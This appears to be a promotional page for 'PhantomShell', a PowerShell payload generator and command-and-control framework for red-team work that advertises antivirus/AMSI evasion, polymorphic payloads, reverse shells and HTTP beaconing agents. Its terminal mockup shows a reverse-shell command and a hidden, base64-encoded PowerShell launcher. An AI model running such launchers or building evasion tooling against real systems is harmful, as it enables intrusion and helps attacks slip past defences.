AV/AMSI Evasion 3-Layer Encoding Polymorphic HTTP Agents

Advanced PowerShell
C2 Framework

PhantomShell combines an advanced PowerShell payload generator with a unified Command & Control infrastructure for professional red-team operations.

v2.0

Latest Release

5+

Payload Formats

100%

Python Standard Library

phantom@c2:~$
$ python3 phantomshell.py revshell -i 10.10.10.5 -p 4444
[+] Payload Ready
[*] Profile: aggressive | Layers: 1
[*] Fingerprint: A3F7B9C1
powershell -NoP -sta -NonI -W Hidden -enc JAB4QUExAD0...
[*] Listener: python3 phantomc2.py --port 4444

Built for Red Teamers

Everything you need for professional adversary simulation and penetration testing.

AV/AMSI Evasion

Multi-layer encoding, variable renaming, and polymorphic payloads designed to bypass signature-based detection.

3 Layers

Unified C2 Server

TCP reverse shells + HTTP agent support with Web UI, CLI interface, and real-time session management.

TCP + HTTP

Polymorphic Generation

Generate unique payload variants with random variable names, different every time.

Randomized

5 Delivery Formats

PowerShell, CMD, HTA, VBS, and MSHTA — choose the best format for your attack vector.

Multi-Format

HTTP Agent Support

Firewall-friendly polling agents that beacon via HTTP/HTTPS with command queuing.

Polling

All-in-One Deployment

Generate, host, and serve payloads with built-in HTTP server and download cradles.

One Command